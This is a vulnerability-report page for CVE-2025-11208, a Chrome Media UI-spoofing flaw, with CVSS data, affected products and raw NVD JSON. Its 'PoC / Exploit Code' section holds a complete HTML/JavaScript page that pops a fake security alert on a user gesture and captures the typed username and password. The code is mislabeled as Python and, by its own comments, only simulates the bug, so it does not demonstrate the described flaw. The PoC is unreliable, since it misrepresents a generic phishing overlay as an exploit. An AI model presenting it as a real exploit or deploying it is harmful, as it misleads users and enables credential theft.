Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11208 CVSS 6.3 MEDIUM

CVE-2025-11208

Published: 2025-11-06 22:15:39
Last Modified: 2025-11-13 15:30:30
Source: [email protected]

Description

Inappropriate implementation in Media in Google Chrome prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 141.0.7390.54

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11208 UI Spoofing PoC // This PoC demonstrates UI spoofing through Media component manipulation <!DOCTYPE html> <html> <head> <title>CVE-2025-11208 PoC</title> <style> .overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999; } .fake-ui { position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; border: 2px solid #ccc; padding: 20px; border-radius: 10px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); z-index: 10000; } .hidden-video { position: absolute; opacity: 0; pointer-events: auto; } </style> </head> <body> <h1>Media Component UI Spoofing Demo</h1> <p>Interact with the page to trigger the vulnerability</p> <video id="media" class="hidden-video" width="1" height="1"> <source src="data:,"> </video> <div id="overlay" class="overlay"></div> <div id="fake-ui" class="fake-ui" style="display:none;"> <h3>πŸ” Security Alert</h3> <p>Please re-enter your credentials:</p> <input type="text" placeholder="Username"><br><br> <input type="password" placeholder="Password"><br><br> <button onclick="collectData()">Submit</button> </div> <script> const media = document.getElementById('media'); const overlay = document.getElementById('overlay'); const fakeUI = document.getElementById('fake-ui'); // Simulate media gesture handling vulnerability function triggerVulnerability() { // Exploit the Media component UI handling media.addEventListener('play', function() { // Manipulate DOM to overlay fake UI overlay.style.display = 'block'; fakeUI.style.display = 'block'; // This simulates the UI spoofing where attacker // can intercept user gestures intended for media controls overlay.addEventListener('click', function(e) { // Trap user interaction e.stopPropagation(); }); }); // Trigger the vulnerability media.play().catch(() => {}); } // User interaction simulation document.body.addEventListener('mousedown', triggerVulnerability); document.body.addEventListener('touchstart', triggerVulnerability); function collectData() { const inputs = document.querySelectorAll('#fake-ui input'); console.log('Stolen credentials:', inputs[0].value, inputs[1].value); alert('Data collected (for demonstration only)'); } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11208", "sourceIdentifier": "[email protected]", "published": "2025-11-06T22:15:38.740", "lastModified": "2025-11-13T15:30:30.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Media in Google Chrome prior to 141.0.7390.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "141.0.7390.54", "matchCriteriaId": "008031A0-CC1E-47CF-A136-90F4FE1FA9A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_30.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/397878997", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.